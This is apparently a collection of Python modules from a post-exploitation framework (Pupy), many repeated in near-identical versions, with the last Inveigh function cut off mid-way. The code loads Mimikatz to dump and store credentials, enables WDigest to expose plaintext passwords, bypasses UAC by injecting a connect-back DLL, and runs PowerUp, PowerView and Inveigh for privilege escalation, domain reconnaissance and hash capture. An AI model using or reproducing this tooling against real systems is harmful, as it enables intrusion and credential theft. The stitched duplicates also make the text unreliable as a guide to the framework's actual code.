def run(self, args):
    """Report whether the client host looks like a virtual machine.

    On Windows the check is delegated to Nishang's Check-VM.ps1; on Linux and
    macOS to the client-side "checkvm" package.

    Args:
        args: parsed module arguments (not read by this method).

    Returns:
        None; results are reported through self.success / self.info.
    """
    if self.client.is_windows():
        # The script is read from the local tree on every call; the file
        # handle returned by open() is never closed.
        content = open(
            os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
        function = 'Check-VM'
        output = execute_powershell_script(self, content, function)
        # Whitespace-only output is treated as "no VM detected".
        if output.strip():
            self.success("%s" % output)
        else:
            self.success("No virtual machine detected")
    elif self.client.is_linux():
        self.client.load_package("checkvm")
        vm = self.client.conn.modules["checkvm"].checkvm()
        if vm:
            self.success('This appears to be a %s virtual machine' % vm)
        else:
            self.success('This does not appear to be a virtual machine')
    elif self.client.is_darwin():
        self.client.load_package("checkvm")
        self.info('Be patient, could take a while')
        vm = self.client.conn.modules["checkvm"].checkvm()
        if vm:
            self.success('This appears to be a %s virtual machine' % vm)
        else:
            self.success('This does not appear to be a virtual machine')
    # No branch for other platforms: the method silently does nothing there.
def run(self, args):
    """Run Invoke-Mimikatz on the client and store the parsed credentials.

    Args:
        args: parsed module arguments; args.command is passed verbatim as the
            PowerShell command to execute once the script is loaded.

    Returns:
        None; raw output goes to self.success, failures to self.error, parsed
        credentials to the Credentials() database.
    """
    # check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
    script = 'mimikatz'
    # check if file has been already uploaded to the target
    # NOTE(review): the loop never breaks, so `content` reflects only the
    # last arch checked ('x86'); the 'x64' result is overwritten. The open()
    # handle is never closed.
    for arch in ['x64', 'x86']:
        if script not in self.client.powershell[arch]['scripts_loaded']:
            content = open(
                os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read()
        else:
            content = ''
    output = execute_powershell_script(self, content, args.command, x64IfPossible=True, script_name=script)
    # Empty output is reported as a (probable) privilege problem.
    if not output:
        self.error("Error running mimikatz. Enough privilege ?")
        return
    self.success("%s" % output)
    creds = self.parse_mimikatz(output)
    db = Credentials()
    db.add(creds)
    self.success("Credentials stored on the database")
def bypassuac_through_powerSploitBypassUAC(self): ''' Performs an UAC bypass attack by using the powersloit UACBypass script (wind7 to 8.1) ''' #Constants self.module.info('Running powersloit UACBypass method for bypassing UAC...') bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) self.module.info('Uploading temporary files') self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) self.module.info('Starting the UAC Bypass process') output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) logging.debug("BypassUAC script output: %s\n"%(output)) if "DLL injection complete!" in output: self.module.success("UAC bypassed") else: self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") #Clean tmp files tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] logging.debug("Deleting temporary files") self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) #... self.module.success("Waiting for a connection from the DLL (take few seconds)...") self.module.success("If nothing happened, try to migrate to another process and try again.")
def bypassuac_through_PowerSploitBypassUAC(self): ''' Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) ''' #Constants bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath) self.module.info('Uploading temporary files') self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I) logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) self.module.info('Starting the UAC Bypass process') output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True) logging.debug("BypassUAC script output: %s\n"%(output)) if "DLL injection complete!" in output: self.module.success("UAC bypassed") else: self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") #Clean tmp files tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath] logging.debug("Deleting temporary files") self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files) #... self.module.success("Waiting for a connection from the DLL (take few seconds)...") self.module.success("If nothing happened, try to migrate to another process and try again.")
def run(self, args):
    """Run Nishang's Check-VM on the client and print its raw output.

    Args:
        args: parsed module arguments (not read by this method).

    Returns:
        None; the script output is reported through self.success, even when
        it is empty.
    """
    # The open() handle is never closed.
    content = open(
        os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
    function = 'Check-VM'
    output = execute_powershell_script(self, content, function)
    self.success("%s" % output)
def run(self, args):
    """Run Invoke-Mimikatz on the client, or toggle the WDigest setting.

    Args:
        args: parsed module arguments. When args.wdigest is set the method
            only calls the client-side wdigest helper and returns; otherwise
            args.command is passed verbatim as the PowerShell command.

    Returns:
        None; output goes to self.success / self.warning / self.error, parsed
        credentials to the Credentials() database.
    """
    # For Windows 10: if the UseLogonCredential registry value is absent or
    # disabled (equal to 0), no plaintext password can be retrieved using
    # mimikatz.
    if args.wdigest:
        self.client.load_package("pupwinutils.wdigest")
        ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
        if ok:
            self.success(message)
        else:
            self.warning(str(message))
        # The registry change and the mimikatz run are mutually exclusive.
        return
    script ='mimikatz'
    # check if file has been already uploaded to the target
    # NOTE(review): the loop never breaks, so `content` reflects only the
    # last arch checked ('x86'); the 'x64' result is overwritten. The open()
    # handle is never closed.
    for arch in ['x64', 'x86']:
        if script not in self.client.powershell[arch]['scripts_loaded']:
            content = open(os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read()
        else:
            content = ''
    output = execute_powershell_script(self, content, args.command, x64IfPossible=True, script_name=script)
    # Empty output is reported as a (probable) privilege problem.
    if not output:
        self.error("Error running mimikatz. Enough privilege ?")
        return
    self.success("%s" % output)
    creds = self.parse_mimikatz(output)
    db = Credentials()
    db.add(creds)
    self.success("Credentials stored on the database")
def bypassuac_through_PowerSploitBypassUAC(self): ''' Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) ''' #Constants bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format( self.mainPowershellScriptRemotePath ) #{0}=mainPowerShellScriptPrivileged.ps1 byPassUACSuccessString = "DLL injection complete!" self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ", "Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) logging.info( "Starting BypassUAC script with the following cmd: {0}".format( bypassUACcmd)) output = execute_powershell_script(self.module, content, bypassUACcmd) logging.info("BypassUAC script output: %s\n" % (output)) if byPassUACSuccessString in output: self.module.success("UAC bypassed") else: self.module.warning( "Impossible to know what's happened remotely. You should active debug mode." ) #Clean self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath) self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath) self.deleteTHisRemoteFile(self.invokeBypassUACRemotePath) self.deleteTHisRemoteFile(self.pupyDLLRemotePath) #... self.module.success( "Waiting for a connection from the DLL (take few seconds)...")
def run(self, args):
    """Run Nishang's Check-VM on the client and report the result.

    Args:
        args: parsed module arguments (not read by this method).

    Returns:
        None; results are reported through self.success.
    """
    # The open() handle is never closed.
    content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
    function = 'Check-VM'
    output = execute_powershell_script(self, content, function)
    # Whitespace-only output is treated as "no VM detected".
    if output.strip():
        self.success("%s" % output)
    else:
        self.success("No virtual machine detected")
def run(self, args):
    """Run Nishang's Check-VM on the client and report the result.

    Args:
        args: parsed module arguments (not read by this method).

    Returns:
        None; results are reported through self.success.
    """
    # The open() handle is never closed.
    content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), "r").read()
    function = "Check-VM"
    output = execute_powershell_script(self, content, function)
    # Whitespace-only output is treated as "no VM detected".
    if output.strip():
        self.success("%s" % output)
    else:
        self.success("No virtual machine detected")
def run(self, args): content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read() # launch all PowerUp checks function = 'Invoke-AllChecks' output = execute_powershell_script(self, content, function) # parse output depending on the PowerUp output output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n") self.success("Output of the script: \n%s" % output)
def run(self, args): content = open( os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read() # launch all PowerUp checks function = 'Invoke-AllChecks' output = execute_powershell_script(self, content, function) # parse output depending on the PowerUp output output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace( "\n\n", "\n").replace("\n\n", "\n") self.success("%s" % output)
def run(self, args): script = 'powerup' # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read() else: content = '' output = execute_powershell_script(self, content, args.command, script_name=script) # parse output depending on the PowerUp output output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n") self.success("%s" % output)
def run(self, args): script = 'powerview' # check if file has been already uploaded to the target for arch in ['x64', 'x86']: if script not in self.client.powershell[arch]['scripts_loaded']: content = open(os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1"), 'r').read() else: content = '' output = execute_powershell_script(self, content, args.command, script_name=script) if not output: self.error("No results") return self.success("Output: \n%s\n" % output)
def run(self, args):
    """Report whether the client host looks like a virtual machine.

    On Windows the check is delegated to Nishang's Check-VM.ps1; on Linux to
    the client-side "checkvm" package.

    Args:
        args: parsed module arguments (not read by this method).

    Returns:
        None; results are reported through self.success.
    """
    if self.client.is_windows():
        # The open() handle is never closed.
        content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
        function = 'Check-VM'
        output = execute_powershell_script(self, content, function)
        # Whitespace-only output is treated as "no VM detected".
        if output.strip():
            self.success("%s" % output)
        else:
            self.success("No virtual machine detected")
    elif self.client.is_linux():
        self.client.load_package("checkvm")
        vm = self.client.conn.modules["checkvm"].checkvm()
        if vm:
            self.success('This appears to be a %s virtual machine' % vm)
        else:
            self.success('This does not appear to be a virtual machine')
    # No branch for other platforms: the method silently does nothing there.
def run(self, args):
    """Run Invoke-Mimikatz with its default arguments and store the credentials.

    Args:
        args: parsed module arguments (not read by this method).

    Returns:
        None; raw output goes to self.success, failures to self.error, parsed
        credentials to the Credentials() database.
    """
    # check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
    # The script is re-read and re-sent on every call; the open() handle is
    # never closed.
    content = open(os.path.join(ROOT, "external", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"), 'r').read()
    function = 'Invoke-Mimikatz'
    output = execute_powershell_script(self, content, function, x64IfPossible=True)
    # Empty output is reported as a (probable) privilege problem.
    if not output:
        self.error("Error running mimikatz. Enough privilege ?")
        return
    self.success("%s" % output)
    creds = self.parse_mimikatz(output)
    db = Credentials()
    db.add(creds)
    self.success("Credentials stored on the database")
def run(self, args):
    """Run Invoke-Mimikatz on the client, or toggle the WDigest setting.

    Args:
        args: parsed module arguments. When args.wdigest is set the method
            only calls the client-side wdigest helper and returns; otherwise
            args.command is passed verbatim as the PowerShell command.

    Returns:
        None; output goes to self.success / self.warning / self.error, parsed
        credentials to the Credentials() database.
    """
    # For Windows 10: if the UseLogonCredential registry value is absent or
    # disabled (equal to 0), no plaintext password can be retrieved using
    # mimikatz.
    if args.wdigest:
        self.client.load_package("pupwinutils.wdigest")
        ok, message = self.client.conn.modules[
            "pupwinutils.wdigest"].wdigest(args.wdigest)
        if ok:
            self.success(message)
        else:
            self.warning(str(message))
        # The registry change and the mimikatz run are mutually exclusive.
        return
    script = 'mimikatz'
    # check if file has been already uploaded to the target
    # NOTE(review): the loop never breaks, so `content` reflects only the
    # last arch checked ('x86'); the 'x64' result is overwritten. The open()
    # handle is never closed.
    for arch in ['x64', 'x86']:
        if script not in self.client.powershell[arch]['scripts_loaded']:
            content = open(
                os.path.join(ROOT, "external", "PowerSploit", "Exfiltration",
                             "Invoke-Mimikatz.ps1"), 'r').read()
        else:
            content = ''
    output = execute_powershell_script(self, content, args.command,
                                       x64IfPossible=True, script_name=script)
    # Empty output is reported as a (probable) privilege problem.
    if not output:
        self.error("Error running mimikatz. Enough privilege ?")
        return
    self.success("%s" % output)
    creds = self.parse_mimikatz(output)
    db = Credentials()
    db.add(creds)
    self.success("Credentials stored on the database")
def bypassuac_through_PowerSploitBypassUAC(self): ''' Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1) ''' #Constants bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(self.mainPowershellScriptRemotePath) #{0}=mainPowerShellScriptPrivileged.ps1 byPassUACSuccessString = "DLL injection complete!" self.uploadPowershellScripts() self.uploadPupyDLL() content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I) logging.info("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd)) output = execute_powershell_script(self.module, content, bypassUACcmd) logging.info("BypassUAC script output: %s\n"%(output)) if byPassUACSuccessString in output: self.module.success("UAC bypassed") else: self.module.warning("Impossible to know what's happened remotely. You should active debug mode.") #Clean self.deleteTHisRemoteFile(self.invokeReflectivePEInjectionRemotePath) self.deleteTHisRemoteFile(self.mainPowershellScriptRemotePath) self.deleteTHisRemoteFile(self.invokeBypassUACRemotePath) self.deleteTHisRemoteFile(self.pupyDLLRemotePath) #... self.module.success("Waiting for a connection from the DLL (take few seconds)...")
def run(self, args):
    """Run Nishang's Check-VM on the client and print its raw output.

    Args:
        args: parsed module arguments (not read by this method).

    Returns:
        None; the script output is reported through self.success, even when
        it is empty.
    """
    # The open() handle is never closed.
    content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
    function = 'Check-VM'
    output = execute_powershell_script(self, content, function)
    self.success("%s" % output)
def bypassuac_through_trusted_publisher_certificate(module, rootPupyPath):
    '''
    Performs a bypass UAC attack by utilizing the trusted publisher certificate through process injection.

    Builds the helper PowerShell script and the base64-wrapped pupy DLL in the
    local temp directory, uploads them under random names in the client's
    %TEMP%, runs the bypass script, then deletes the remote files.

    Args:
        module: the pupy module driving the client (module.client, logging
            helpers success/warning/error).
        rootPupyPath: local root of the pupy checkout, used to locate the
            bundled PowerSploit / Empire scripts.

    Returns:
        None. Returns early (after module.error) when the client architecture
        is neither x64 nor x86.
    '''
    # NOTE(review): "psutil" is loaded but not referenced in this function.
    module.client.load_package("psutil")
    module.client.load_package("pupwinutils.processes")
    #Define Remote paths
    # Remote names come from tempfile's private _get_candidate_names().
    # NOTE(review): "{0}.{1}" with a '.txt' / '.ps1' suffix yields a double
    # dot ("name..txt"); harmless but probably unintended.
    remoteTempFolder = module.client.conn.modules['os.path'].expandvars(
        "%TEMP%")
    invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(
        module.client.conn.modules['os.path'].join(
            remoteTempFolder, next(_get_candidate_names())), '.txt')
    invokeBypassUACRemotePath = "{0}.{1}".format(
        module.client.conn.modules['os.path'].join(
            remoteTempFolder, next(_get_candidate_names())), '.ps1')
    mainPowershellScriptRemotePath = "{0}.{1}".format(
        module.client.conn.modules['os.path'].join(
            remoteTempFolder, next(_get_candidate_names())), '.ps1')
    pupyDLLRemotePath = "{0}.{1}".format(
        module.client.conn.modules['os.path'].join(
            remoteTempFolder, next(_get_candidate_names())), '.txt')
    #Define Local paths
    # Local scratch files use fixed names in gettempdir() and are never
    # removed by this function.
    mainPowerShellScriptPrivilegedLocalPath = os.path.join(
        gettempdir(), 'mainPowerShellScriptPrivileged.txt')
    invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external",
                                            "Empire", "privesc",
                                            "Invoke-BypassUAC.ps1")
    invokeReflectivePEInjectionLocalPath = os.path.join(
        rootPupyPath, "pupy", "external", "PowerSploit", "CodeExecution",
        "Invoke-ReflectivePEInjection.ps1")
    # NOTE(review): duplicate of the assignment above (same value).
    invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external",
                                            "Empire", "privesc",
                                            "Invoke-BypassUAC.ps1")
    pupyDLLLocalPath = os.path.join(gettempdir(), 'dllFile.txt')
    #Constants
    bypassUACcmd = "Invoke-BypassUAC -Command 'powershell.exe -ExecutionPolicy Bypass -file {0} -Verbose'".format(
        mainPowershellScriptRemotePath
    )  #{0}=mainPowerShellScriptPrivileged.ps1
    # Marker searched for in the script output to decide success.
    byPassUACSuccessString = "DLL injection complete!"
    #main powershell script executed by bypassuac powershell script
    mainPowerShellScriptPrivileged = """
cat {0} | Out-String | iex
cat {1} | Out-String | iex
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ForceASLR
"""  #{0}=Invoke-ReflectivePEInjection.txt and {1}=dllFile.txt
    logging.info("Creating the Powershell script in %s locally" %
                 (mainPowerShellScriptPrivilegedLocalPath))
    with open(mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
        w.write(
            mainPowerShellScriptPrivileged.format(
                invokeReflectivePEInjectionRemotePath, pupyDLLRemotePath))
    logging.info("Uploading powershell code for DLL injection in {0}".format(
        invokeReflectivePEInjectionRemotePath))
    upload(module.client.conn, invokeReflectivePEInjectionLocalPath,
           invokeReflectivePEInjectionRemotePath)
    # NOTE(review): the bypass script is never uploaded (commented out
    # below) - it is sent inline via execute_powershell_script - yet
    # invokeBypassUACRemotePath is still deleted in the cleanup loop.
    #logging.info("Uploading powershell code for UAC Bypass in {0}".format())
    #upload(module.client.conn, invokeBypassUACLocalPath, invokeBypassUACRemotePath)
    logging.info(
        "Uploading main powershell script executed by BypassUAC in {0}".format(
            mainPowerShellScriptPrivilegedLocalPath))
    upload(module.client.conn, mainPowerShellScriptPrivilegedLocalPath,
           mainPowershellScriptRemotePath)
    # host/port are only logged here; the DLL is built from get_conf() below.
    res = module.client.conn.modules['pupy'].get_connect_back_host()
    host, port = res.rsplit(':', 1)
    logging.info("Address configured is %s:%s for pupy dll..." %
                 (host, port))
    logging.info("Looking for process architecture...")
    if module.client.conn.modules['pupwinutils.processes'].is_x64_architecture(
    ) == True:
        logging.info("Target achitecture is x64, using a x64 dll")
        dllbuff = pupygen.get_edit_pupyx64_dll(module.client.get_conf())
    elif module.client.conn.modules[
            'pupwinutils.processes'].is_x86_architecture() == True:
        logging.info("Target achitecture is x86, using a x86 dll")
        dllbuff = pupygen.get_edit_pupyx86_dll(module.client.get_conf())
    else:
        # Files uploaded above are not cleaned up on this early return.
        module.error(
            "Target architecture is unknown (!= x86 or x64), abording...")
        return
    logging.info("Creating the pupy dll in %s locally" % (pupyDLLLocalPath))
    # The DLL is shipped as a PowerShell assignment of its base64 encoding.
    with open(pupyDLLLocalPath, 'w+') as w:
        w.write('$PEBytes = [System.Convert]::FromBase64String("%s")' %
                (base64.b64encode(dllbuff)))
    logging.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath))
    upload(module.client.conn, pupyDLLLocalPath, pupyDLLRemotePath)
    # Write-Verbose -> Write-Output, presumably so the script's verbose
    # messages land in the captured output the success check relies on.
    # The open() handle is never closed.
    content = re.sub("Write-Verbose ", "Write-Output ",
                     open(invokeBypassUACLocalPath, 'r').read(),
                     flags=re.I)
    logging.info(
        "Starting BypassUAC script with the following cmd: {0}".format(
            bypassUACcmd))
    output = execute_powershell_script(module, content, bypassUACcmd)
    logging.info("BypassUAC script output: %s\n" % (output))
    # NOTE(review): if execute_powershell_script returns None this `in`
    # test raises TypeError - confirm its contract.
    if byPassUACSuccessString in output:
        module.success("UAC bypassed")
    else:
        module.warning(
            "Impossible to know what's happened remotely. You should active debug mode."
        )
    # Cleanup runs whether or not the success marker was seen. Each path is
    # interpolated into a cmd.exe command line (shell=True); a non-zero exit
    # raises CalledProcessError, which is not caught here.
    for aFile in [
            invokeReflectivePEInjectionRemotePath, invokeBypassUACRemotePath,
            mainPowershellScriptRemotePath, pupyDLLRemotePath
    ]:
        logging.info("Deleting remote file {0}".format(aFile))
        output = module.client.conn.modules.subprocess.check_output(
            "DEL /F /Q \"{0}\"".format(aFile),
            stderr=subprocess.STDOUT,
            stdin=subprocess.PIPE,
            shell=True)
        logging.debug("Delete Status: {0}".format(repr(output)))
    module.success(
        "Waiting for a connection from the DLL (take few seconds)...")
def run(self, args):
    """Run the PowerView cmdlet selected by the module's flags (or args.command).

    Args:
        args: parsed module arguments. One selector flag picks a cmdlet; when
            none is set, args.command is used as the raw command string.

    Returns:
        None; output goes to self.success, errors to self.error.
    """
    script = 'powerview'
    command = ""
    if args.list_available_commands:
        self.log(self.commands_available)
        return
    # check if file has been already uploaded to the target
    # NOTE(review): the loop never breaks, so `content` reflects only the
    # last arch checked ('x86'); the 'x64' result is overwritten. The open()
    # handle is never closed.
    for arch in ['x64', 'x86']:
        if script not in self.client.powershell[arch]['scripts_loaded']:
            logging.debug("Loading PowerView.ps1 script on target...")
            content = open(os.path.join(ROOT, "external", "PowerSploit", "Recon", "PowerView.ps1"), 'r').read()
        else:
            logging.debug("PowerView.ps1 script already loaded on target")
            content = ''
    # Flag -> cmdlet mapping. NOTE(review): GetProxy sits in its own `if`,
    # so any flag of the following if/elif chain overrides it. Argument
    # values (GetNetGroupWith, *On, FindGPOLocation) are interpolated
    # unquoted into the PowerShell command line.
    if args.GetProxy == True:
        command = "Get-Proxy"
    if args.GetNetComputer == True:
        command = "Get-NetComputer"
    elif args.GetNetMssql == True:
        command = "Get-NetComputer -SPN mssql*"
    elif args.GetNetSubnet == True:
        command = "Get-NetSubnet"
    elif args.GetNetGroup == True:
        command = "Get-NetGroup"
    elif args.GetNetGroupWith !=None:
        command = "Get-NetGroup -GroupName *{0}* -FullData".format(args.GetNetGroupWith)
    elif args.GetNetGroupMember == True:
        command = "Get-NetGroupMember"
    elif args.GetNetFileServer == True:
        command = "Get-NetFileServer"
    elif args.GetDFSshare == True:
        command = "Get-DFSshare"
    elif args.GetNetGPO == True:
        command = "Get-NetGPO"
    elif args.GetNetGPOGroup == True:
        command = "Get-NetGPOGroup"
    elif args.FindGPOLocation !=None:
        command = "Find-GPOLocation -UserName {0}".format(args.FindGPOLocation)
    elif args.GetNetLocalGroup == True:
        command = "Get-NetLocalGroup"
    elif args.GetNetLoggedon == True:
        command = "Get-NetLoggedon"
    elif args.GetNetLoggedonOn !=None:
        command = "Get-NetLoggedon -ComputerName {0}".format(args.GetNetLoggedonOn)
    elif args.GetNetSession == True:
        command = "Get-NetSession"
    elif args.GetNetSessionOn !=None:
        command = "Get-NetSession -ComputerName {0}".format(args.GetNetSessionOn)
    elif args.GetNetRDPSession == True:
        command = "Get-NetRDPSession"
    elif args.GetNetRDPSessionOn !=None:
        command = "Get-NetRDPSession -ComputerName {0}".format(args.GetNetRDPSessionOn)
    elif args.GetLastLoggedOn == True:
        command = "Get-LastLoggedOn"
    elif args.GetLastLoggedOnOn !=None:
        command = "Get-LastLoggedOn -ComputerName {0}".format(args.GetLastLoggedOnOn)
    elif args.InvokeUserHunterCheck == True:
        command = "Invoke-UserHunter -CheckAccess"
    elif args.InvokeUserHunterForest == True:
        command = "Invoke-UserHunter -SearchForest"
    elif args.GetExploitableSystem == True:
        command = "Get-ExploitableSystem | Format-Table -AutoSize"
    # Fall back to the free-form command only when no flag selected one.
    if command == "":
        if args.command == None:
            self.error("You have to choose a powerview command!")
            return
        else:
            command = args.command
    logging.debug("Executing the following powerview command: {0}".format(command))
    output = execute_powershell_script(self, content, command, script_name=script)
    if not output:
        self.error("No results")
        return
    self.success("Output: \n%s\n" % output)
def run(self, args):
    """Drive Inveigh on the client: start a variant, stop it, or fetch results.

    Args:
        args: parsed module arguments (tmpOutFolder, localOutputFolder, the
            InvokeInveigh* / StopInveigh / getResults selectors, inveighParams).

    Returns:
        None; messages go to self.success / self.error.
    """
    script = 'inveigh'
    pathToScript, command, remote_temp_folder = "", "", ""
    # Remote folder that receives Inveigh's file output (see commonOptions).
    if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER:
        remote_temp_folder = self.client.conn.modules[
            'os.path'].expandvars("%TEMP%")
    else:
        remote_temp_folder = args.tmpOutFolder
    logging.debug(
        '{0} used for saving real time results on the target'.format(
            remote_temp_folder))
    # Prepended to every Invoke-* call: file output into remote_temp_folder.
    commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(
        remote_temp_folder)
    logging.debug(
        "These folowing Inveigh parameters will be given by default: {0}".
        format(commonOptions))
    # Remote result file paths; presumably consumed by downloadInveighFiles /
    # removeRemoteInveighFiles (defined elsewhere in the class).
    self.path_log_out_file = ntpath.join(remote_temp_folder,
                                         self.LOG_OUT_FILE)
    self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder,
                                            self.NTLMV1_OUT_FILE)
    self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder,
                                            self.NTLMV2_OUT_FILE)
    self.path_cleartext_out_file = ntpath.join(remote_temp_folder,
                                               self.CLEARTEXT_OUT_FILE)
    localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder)
    if args.InvokeInveigh == False and args.InvokeInveighUnprivileged == False and args.InvokeInveighRelay == False and args.StopInveigh == False and args.getResults == False:
        self.error("You have to give a command")
        return
    # getResults only downloads; it never touches the PowerShell session.
    if args.getResults == True:
        nb = self.downloadInveighFiles(remote_temp_folder, localFolder)
        if nb == 0:
            self.error(
                "No one Inveigh result file downloaded. Is Inveigh is running on the target?"
            )
        else:
            self.success("All Inveigh results downloaded")
        return
    elif args.InvokeInveigh == True:
        self.success("Invoke-Inveigh command selected")
        pathToScript = os.path.join(ROOT, "external", "Inveigh",
                                    "Inveigh.ps1")
        # args.inveighParams is appended verbatim to the command line.
        command = "Invoke-Inveigh" + commonOptions + args.inveighParams
    elif args.InvokeInveighUnprivileged == True:
        self.success("Invoke-InveighUnprivileged command selected")
        pathToScript = os.path.join(ROOT, "external", "Inveigh",
                                    "Inveigh-Unprivileged.ps1")
        command = "Invoke-InveighUnprivileged" + commonOptions + args.inveighParams
    elif args.InvokeInveighRelay == True:
        self.success("Invoke-Relay command selected")
        pathToScript = os.path.join(ROOT, "external", "Inveigh",
                                    "Inveigh-Relay.ps1")
        command = "Invoke-Relay" + commonOptions + args.inveighParams
    elif args.StopInveigh == True:
        pathToScript = os.path.join(ROOT, "external", "Inveigh",
                                    "Inveigh.ps1")
        command = "Stop-Inveigh"
    logging.debug(
        "The following script will be loaded on the target if needed: {0}".
        format(pathToScript))
    # NOTE(review): the loop never breaks, so `content` reflects only the
    # last arch checked ('x86'); the 'x64' result is overwritten. The open()
    # handle is never closed.
    for arch in ['x64', 'x86']:
        logging.debug("Powershell script actually loaded: {0}".format(
            self.client.powershell[arch]['scripts_loaded']))
        if script not in self.client.powershell[arch]['scripts_loaded']:
            logging.debug(
                "Loading {0} script on target...".format(pathToScript))
            content = open(pathToScript, 'r').read()
        else:
            logging.debug(
                "{0} script already loaded on target".format(pathToScript))
            content = ''
    logging.debug(
        "Executing the following inveigh command: {0}".format(command))
    output = execute_powershell_script(self, content, command,
                                       x64IfPossible=True, script_name=script)
    if not output:
        self.error("No results")
        return
    self.success("Output: \n%s\n" % output)
    # After a confirmed stop, collect the result files and remove them remotely.
    if args.StopInveigh == True and "exited at " in str(output):
        self.success("Inveigh is stopped")
        self.downloadInveighFiles(remote_temp_folder, localFolder)
        self.removeRemoteInveighFiles()
def run(self, args):
    """Drive Inveigh on the client: start a variant, stop it, or fetch results.

    Args:
        args: parsed module arguments (tmpOutFolder, localOutputFolder, the
            InvokeInveigh* / StopInveigh / getResults selectors, inveighParams).

    Returns:
        None; messages go to self.success / self.error.
    """
    script = 'inveigh'
    pathToScript, command, remote_temp_folder = "", "", ""
    # Remote folder that receives Inveigh's file output (see commonOptions).
    if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER:
        remote_temp_folder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
    else:
        remote_temp_folder = args.tmpOutFolder
    logging.debug('{0} used for saving real time results on the target'.format(remote_temp_folder))
    # Prepended to every Invoke-* call: file output into remote_temp_folder.
    commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(remote_temp_folder)
    logging.debug("These folowing Inveigh parameters will be given by default: {0}".format(commonOptions))
    # Remote result file paths; presumably consumed by downloadInveighFiles /
    # removeRemoteInveighFiles (defined elsewhere in the class).
    self.path_log_out_file = ntpath.join(remote_temp_folder, self.LOG_OUT_FILE)
